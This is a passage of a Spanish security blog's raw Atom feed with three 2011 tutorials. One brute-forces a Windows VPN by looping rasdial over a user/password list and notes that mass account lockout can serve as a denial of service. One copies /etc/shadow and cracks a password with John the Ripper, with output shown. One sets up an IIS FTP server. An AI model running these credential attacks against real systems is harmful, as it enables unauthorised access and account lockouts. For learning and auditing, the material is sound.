&lt;a href="http://feedads.g.doubleclick.net/~a/TGcSzJ0iLqi6_VUNJb0tF6z6TtA/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/TGcSzJ0iLqi6_VUNJb0tF6z6TtA/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Redes-seguridad/~4/uEFemWBx6nA" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.redes-seguridad.com.ar/feeds/6509857222925157841/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=1618663333888458484&amp;postID=6509857222925157841" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/6509857222925157841?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/6509857222925157841?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Redes-seguridad/~3/uEFemWBx6nA/ejecutar-tareas-remotamente-pstools.html" title="Ejecutar Comandos remotamente (PStools)" /><author><name>Hernán Tirado (Morsa)</name><uri>http://www.blogger.com/profile/18067048875052817204</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total><feedburner:origLink>http://www.redes-seguridad.com.ar/2011/12/ejecutar-tareas-remotamente-pstools.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D0MFRXYyfCp7ImA9WhRXF0k.&quot;"><id>tag:blogger.com,1999:blog-1618663333888458484.post-2221743458899576985</id><published>2011-12-23T11:30:00.000-08:00</published><updated>2011-12-24T08:50:14.894-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-24T08:50:14.894-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Windows" /><category scheme="http://www.blogger.com/atom/ns#" term="Seguridad" /><title>Fuerza Bruta VPN</title><content type="html">&lt;span style="font-weight:bold;"&gt;Editamos un archivo llamado pass.txt, donde dentro pondremos usuarios y contraseñas en dos columnas distintas, por ejemplo:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;Inicio -&gt; ejecutar -&gt; cmd&lt;br /&gt;C:\&gt;edit pass.txt&lt;br /&gt;#usuario   password&lt;br /&gt;usuario1   password1&lt;br /&gt;usuario1   password2&lt;br /&gt;usuario1   passwordM&lt;br /&gt;........   .........&lt;br /&gt;usuario2   password1&lt;br /&gt;usuario2   password2&lt;br /&gt;usuario2   passwordM&lt;br /&gt;........   .........&lt;br /&gt;usuarioN   password1&lt;br /&gt;usuarioN   password2&lt;br /&gt;........   .........&lt;br /&gt;usuarioN   passwordM&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;En este enlace ya hemos visto el comando para conectarnos por línea de comandos a una VPN desde windows: &lt;a href="http://www.redes-seguridad.com.ar/2009/01/conexion-vpn-por-linea-de-comandos.html"&gt;Conexión VPN por CLI&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Utilizaremos este comando dentro de un ciclo for para automatizar el ingreso de usuarios/contraseñas del siguiente modo:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;c:\&gt; FOR /F "tokens=1,2*" %i in (pass.txt) do rasdial miVPN %i %j&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Tengamos en cuenta que &lt;span style="font-weight:bold;"&gt;pass.txt&lt;/span&gt; es el archivo que hemos editado previamente y que &lt;span style="font-weight:bold;"&gt;miVPN &lt;/span&gt;es el nombre que le asignamos cuando creamos la conexión.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;NOTA:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Obviamente si nos encontramos con buenos administradores, podríamos hacerlo solamente 3 o 5 veces, o segun la cantidad de intentos que tenga configurado en sus políticas de dominio para el bloqueo de cuentas de usuario.&lt;br /&gt;&lt;br /&gt;Esto ultimo tiene su ventaja como desventaja, debido a que el administrador de los servidores puede evitar que obtengan passwords de sus usuarios, pero si un atacante posee todos los usuarios del dominio podría a llegar a hacer una forma de DoS (Denegacion de Servicio), debido a que si realiza dicho procedimiento por cada usuario 3 veces lograria bloquear todas las cuentas de un dominio. Esto le daria un gran dolor de cabeza a dicho administrador.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1618663333888458484-2221743458899576985?l=www.redes-seguridad.com.ar' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/0fco9AeVBSi0c-z8T8U90CaCeY0/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/0fco9AeVBSi0c-z8T8U90CaCeY0/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/0fco9AeVBSi0c-z8T8U90CaCeY0/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/0fco9AeVBSi0c-z8T8U90CaCeY0/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Redes-seguridad/~4/4z5ZZZjEN6Y" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.redes-seguridad.com.ar/feeds/2221743458899576985/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=1618663333888458484&amp;postID=2221743458899576985" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/2221743458899576985?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/2221743458899576985?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Redes-seguridad/~3/4z5ZZZjEN6Y/fuerza-bruta-vpn.html" title="Fuerza Bruta VPN" /><author><name>Hernán Tirado (Morsa)</name><uri>http://www.blogger.com/profile/18067048875052817204</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total><feedburner:origLink>http://www.redes-seguridad.com.ar/2011/12/fuerza-bruta-vpn.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0EDSH47fCp7ImA9WhRXFE4.&quot;"><id>tag:blogger.com,1999:blog-1618663333888458484.post-6312226914998880210</id><published>2011-12-20T19:46:00.001-08:00</published><updated>2011-12-20T19:54:39.004-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-20T19:54:39.004-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Linux" /><category scheme="http://www.blogger.com/atom/ns#" term="Seguridad" /><title>Cracking passwd con John the Ripper</title><content type="html">&lt;span style="font-weight:bold;"&gt;Descargamos el John:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@prueba:~# wget http://www.openwall.com/john/g/john-1.7.9.tar.gz&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Destareamos/Descomprimimos:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@prueba:~# tar xzvf john-1.7.9.tar.gz&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Accedemos a la ruta de los fuentes:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@prueba:~# cd john-1.7.9/src/&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Compilamos para linux x86:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@prueba:~/john-1.7.9/src# make linux-x86-any&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Instalamos:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@prueba:~/john-1.7.9/src# make install&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Accedemos a los ejecutables compilados:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@prueba:~/john-1.7.9# cd run/&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Copiamos el passwd y el shadow en otra ruta:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@prueba:~/john-1.7.9/run# cp /etc/passwd /etc/shadow /root/&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Corremos el unshadow y redireccionamos la salida a un archivo llamado unsha.txt:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@prueba:~/john-1.7.9/run# ./unshadow /root/passwd /root/shadow &gt; /root/unsha.txt&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Corremos el john con un modo simple y le pasamos como parametro el archivo que creamos:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@prueba:~/john-1.7.9/run# ./john -single /root/unsha.txt&lt;br /&gt;Loaded 1 password hash (generic crypt(3) [?/32])&lt;br /&gt;guesses: 0  time: 0:00:00:03 23%  c/s: 25.13  trying: Morsa8 - mor$a&lt;br /&gt;guesses: 0  time: 0:00:00:07 38%  c/s: 25.09  trying: Mors4 - \morsa&lt;br /&gt;Mors4            (morsa)&lt;br /&gt;guesses: 1  time: 0:00:00:11 100%  c/s: 25.10  trying: Mors4 - \morsa&lt;br /&gt;Use the "--show" option to display all of the cracked passwords reliably&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Usamos la opción show para ver los passwords crackeados:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;root@prueba:~/john-1.7.9/run# ./john -show /root/unsha.txt&lt;br /&gt;morsa:&lt;span style="font-weight:bold;"&gt;Mors4&lt;/span&gt;:1002:1003::/home/morsa:/bin/sh&lt;br /&gt;1 password hashes cracked, 0 left&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Nos da como resultado del usuario morsa su correspondiente password: &lt;span style="font-weight:bold;"&gt;Mors4&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1618663333888458484-6312226914998880210?l=www.redes-seguridad.com.ar' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/nQchSw3qD-cnWfWRNVdudwOMx_U/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/nQchSw3qD-cnWfWRNVdudwOMx_U/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/nQchSw3qD-cnWfWRNVdudwOMx_U/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/nQchSw3qD-cnWfWRNVdudwOMx_U/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Redes-seguridad/~4/lY8jtAZ-Z6o" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.redes-seguridad.com.ar/feeds/6312226914998880210/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=1618663333888458484&amp;postID=6312226914998880210" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/6312226914998880210?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1618663333888458484/posts/default/6312226914998880210?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Redes-seguridad/~3/lY8jtAZ-Z6o/cracking-passwd-con-john-ripper.html" title="Cracking passwd con John the Ripper" /><author><name>Hernán Tirado (Morsa)</name><uri>http://www.blogger.com/profile/18067048875052817204</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total><feedburner:origLink>http://www.redes-seguridad.com.ar/2011/12/cracking-passwd-con-john-ripper.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEEFRn08cSp7ImA9WhRXE0Q.&quot;"><id>tag:blogger.com,1999:blog-1618663333888458484.post-6608981981960652157</id><published>2011-12-19T09:00:00.000-08:00</published><updated>2011-12-20T07:56:57.379-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-20T07:56:57.379-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Windows" /><title>FTP Server en Windows 2003</title><content type="html">&lt;strong&gt;Ingresamos al panel de Control:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/-72w3GY932NI/Tu9vznGdYaI/AAAAAAAAAuk/68_wvioY6D8/s1600/ScreenHunter_06%2BDec.%2B19%2B11.46.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 242px;" src="http://1.bp.blogspot.com/-72w3GY932NI/Tu9vznGdYaI/AAAAAAAAAuk/68_wvioY6D8/s320/ScreenHunter_06%2BDec.%2B19%2B11.46.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5687887786852311458" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Agregar o quitar programas:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/-wNFTnMtYbxE/Tu9vzZquzeI/AAAAAAAAAuc/8G5ml-bVYkI/s1600/ScreenHunter_07%2BDec.%2B19%2B11.46.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 136px;" src="http://1.bp.blogspot.com/-wNFTnMtYbxE/Tu9vzZquzeI/AAAAAAAAAuc/8G5ml-bVYkI/s320/ScreenHunter_07%2BDec.%2B19%2B11.46.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5687887783246351842" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Agregar o quitar componentes de windows:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/-oeYG6Kg4BDc/Tu9vq9glzwI/AAAAAAAAAuM/PzpY_YHmlsU/s1600/ScreenHunter_08%2BDec.%2B19%2B11.46.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 234px;" src="http://2.bp.blogspot.com/-oeYG6Kg4BDc/Tu9vq9glzwI/AAAAAAAAAuM/PzpY_YHmlsU/s320/ScreenHunter_08%2BDec.%2B19%2B11.46.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5687887638248673026" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Application Server -&gt; Details:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/-pIunFia3ePA/Tu9vqsOZMNI/AAAAAAAAAuE/INw8Iy0E8FA/s1600/ScreenHunter_09%2BDec.%2B19%2B11.47.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 258px;" src="http://1.bp.blogspot.com/-pIunFia3ePA/Tu9vqsOZMNI/AAAAAAAAAuE/INw8Iy0E8FA/s320/ScreenHunter_09%2BDec.%2B19%2B11.47.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5687887633608945874" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Internet Information Services (ISS) -&gt; Details:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/-sFVV5qa-PXs/Tu9vqbHeXTI/AAAAAAAAAt4/_62Hq15dq6w/s1600/ScreenHunter_10%2BDec.%2B19%2B11.47.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 244px;" src="http://1.bp.blogspot.com/-sFVV5qa-PXs/Tu9vqbHeXTI/AAAAAAAAAt4/_62Hq15dq6w/s320/ScreenHunter_10%2BDec.%2B19%2B11.47.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5687887629016522034" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Tildamos File Transfer Protocol (FTP) Service -&gt; Ok&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/-gCrqzYEy_XM/Tu9vqBhkuOI/AAAAAAAAAto/Wq7iXfji7zU/s1600/ScreenHunter_11%2BDec.%2B19%2B11.48.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 258px;" src="http://2.bp.blogspot.com/-gCrqzYEy_XM/Tu9vqBhkuOI/AAAAAAAAAto/Wq7iXfji7zU/s320/ScreenHunter_11%2BDec.%2B19%2B11.48.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5687887622146668770" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Creamos una carpeta que yo llamare: CarpetaFTP en la ruta: c:\Inetpub\ftproot\:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/-ygCfvc3zX24/Tu9vqA_b8mI/AAAAAAAAAtg/dP-RaeMHh-4/s1600/ScreenHunter_12%2BDec.%2B19%2B11.50.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 172px;" src="http://1.bp.blogspot.com/-ygCfvc3zX24/Tu9vqA_b8mI/AAAAAAAAAtg/dP-RaeMHh-4/s320/ScreenHunter_12%2BDec.%2B19%2B11.50.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5687887622003487330" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Abrimos el IIS:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/-Nit5hCrXDss/Tu9vdA3Ld3I/AAAAAAAAAtU/ryTJ_6XsOJ8/s1600/ScreenHunter_13%2BDec.%2B19%2B11.54.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 265px;" src="http://1.bp.blogspot.com/-Nit5hCrXDss/Tu9vdA3Ld3I/AAAAAAAAAtU/ryTJ_6XsOJ8/s320/ScreenHunter_13%2BDec.%2B19%2B11.54.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5687887398630553458" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Desplegamos el arbol -&gt; boton derecho en Default FTP Site -&gt; New -&gt; Virtual Directory:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/-KVRL-PQoPd8/Tu9vczuyCSI/AAAAAAAAAtI/ohC0F3OgNMc/s1600/ScreenHunter_14%2BDec.%2B19%2B11.57.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 223px;" src="http://3.bp.blogspot.com/-KVRL-PQoPd8/Tu9vczuyCSI/AAAAAAAAAtI/ohC0F3OgNMc/s320/ScreenHunter_14%2BDec.%2B19%2B11.57.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5687887395105671458" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Next:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/-ebScxLK80eQ/Tu9vcd4WQPI/AAAAAAAAAs4/TZ1Igfg57KE/s1600/ScreenHunter_16%2BDec.%2B19%2B12.23.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 244px;" src="http://1.bp.blogspot.com/-ebScxLK80eQ/Tu9vcd4WQPI/AAAAAAAAAs4/TZ1Igfg57KE/s320/ScreenHunter_16%2BDec.%2B19%2B12.23.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5687887389240213746" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Ingresamos el Alias para Directorio Virtual:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/-Trh12V_5kAs/Tu9vceAld2I/AAAAAAAAAss/uO2SetJltks/s1600/ScreenHunter_17%2BDec.%2B19%2B12.24.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 246px;" src="http://4.bp.blogspot.com/-Trh12V_5kAs/Tu9vceAld2I/AAAAAAAAAss/uO2SetJltks/s320/ScreenHunter_17%2BDec.%2B19%2B12.24.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5687887389274765154" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Buscamos la carpeta:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/-f7iLjhodcQw/Tu9vcGlOCvI/AAAAAAAAAsk/HsfBCWCoEPs/s1600/ScreenHunter_18%2BDec.%2B19%2B12.24.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 305px;" src="http://4.bp.blogspot.com/-f7iLjhodcQw/Tu9vcGlOCvI/AAAAAAAAAsk/HsfBCWCoEPs/s320/ScreenHunter_18%2BDec.%2B19%2B12.24.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5687887382985968370" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;En nuestro caso permitimos lectura y ejecucion:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/-rGpLiOaLlqo/Tu9vNIh1LkI/AAAAAAAAAsY/y6cJrKX8Wc0/s1600/ScreenHunter_19%2BDec.%2B19%2B12.24.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 247px;" src="http://3.bp.blogspot.com/-rGpLiOaLlqo/Tu9vNIh1LkI/AAAAAAAAAsY/y6cJrKX8Wc0/s320/ScreenHunter_19%2BDec.%2B19%2B12.24.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5687887125810589250" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Finish:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/-I2ZMnR_wnpA/Tu9vNPBfJ_I/AAAAAAAAAsM/x8CfWPhGcG4/s1600/ScreenHunter_20%2BDec.%2B19%2B12.24.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 249px;" src="http://1.bp.blogspot.com/-I2ZMnR_wnpA/Tu9vNPBfJ_I/AAAAAAAAAsM/x8CfWPhGcG4/s320/ScreenHunter_20%2BDec.%2B19%2B12.24.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5687887127553976306" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Desplegamos nuevamente el arbol -&gt; FTP Sites -&gt; Default FTP Site -&gt; CarpetaFTP -&gt; Boton derecho: Permisos&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/-7N_Y0rsGiNI/Tu9vMho-N0I/AAAAAAAAAsE/QbrvCLnMSLY/s1600/ScreenHunter_21%2BDec.%2B19%2B12.26.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 227px;" src="http://2.bp.blogspot.com/-7N_Y0rsGiNI/Tu9vMho-N0I/AAAAAAAAAsE/QbrvCLnMSLY/s320/ScreenHunter_21%2BDec.%2B19%2B12.26.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5687887115371558722" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Clickeamos en Add para agregar el usuario con el cual accederemos al FTP Server:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/-rjw4r9jLYvE/Tu9vMSe66AI/AAAAAAAAAr0/Dv12tOsTMg4/s1600/ScreenHunter_22%2BDec.%2B19%2B12.26.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 260px; height: 320px;" src="http://1.bp.blogspot.com/-rjw4r9jLYvE/Tu9vMSe66AI/AAAAAAAAAr0/Dv12tOsTMg4/s320/ScreenHunter_22%2BDec.%2B19%2B12.26.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5687887111302866946" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Timpeamos en nombre de usuario -&gt; Check Names -&gt; Ok:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/-fxvMWAp2h5E/Tu9vMJEfHYI/AAAAAAAAAro/UDior9cZprk/s1600/ScreenHunter_23%2BDec.%2B19%2B12.27.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 167px;" src="http://1.bp.blogspot.com/-fxvMWAp2h5E/Tu9vMJEfHYI/AAAAAAAAAro/UDior9cZprk/s320/ScreenHunter_23%2BDec.%2B19%2B12.27.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5687887108776074626" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Seleccionamos el usuario en la lista y damos permisos de modificacion, luego OK:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/-UtEIM7vM1J4/Tu9u9r9SQjI/AAAAAAAAArg/4NOd8uIUQUU/s1600/ScreenHunter_24%2BDec.%2B19%2B12.27.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 263px; height: 320px;" src="http://2.bp.blogspot.com/-UtEIM7vM1J4/Tu9u9r9SQjI/AAAAAAAAArg/4NOd8uIUQUU/s320/ScreenHunter_24%2BDec.%2B19%2B12.27.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5687886860443075122" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Boton derecho del mouse sobre CarpetaFTP -&gt; Propiedades:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/-YjtJZemr_GU/Tu9u9HCL5HI/AAAAAAAAArQ/CZWmKhC77Js/s1600/ScreenHunter_25%2BDec.%2B19%2B12.28.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 225px;" src="http://1.bp.blogspot.com/-YjtJZemr_GU/Tu9u9HCL5HI/AAAAAAAAArQ/CZWmKhC77Js/s320/ScreenHunter_25%2BDec.%2B19%2B12.28.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5687886850531517554" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Vamos a la solapa Directory Security, seleccionamos Deny Access -&gt; Add -&gt; Agregamos la ip o el rango de IPs desde el cual permitiremos el acceso FTP:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/-K0wVnC-ozrE/Tu9u8q7mnvI/AAAAAAAAArE/mnECfZP3Jho/s1600/ScreenHunter_26%2BDec.%2B19%2B12.28.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 302px;" src="http://2.bp.blogspot.com/-K0wVnC-ozrE/Tu9u8q7mnvI/AAAAAAAAArE/mnECfZP3Jho/s320/ScreenHunter_26%2BDec.%2B19%2B12.28.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5687886842987716338" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/-k_O_21wqg_k/Tu9u8vRAYNI/AAAAAAAAAq0/d4PGeZREGq8/s1600/ScreenHunter_27%2BDec.%2B19%2B12.29.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 313px; height: 233px;" src="http://4.bp.blogspot.com/-k_O_21wqg_k/Tu9u8vRAYNI/AAAAAAAAAq0/d4PGeZREGq8/s320/ScreenHunter_27%2BDec.%2B19%2B12.29.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5687886844151226578" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Probamos la conexion desde otro windows con un cliente FTP:&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;a 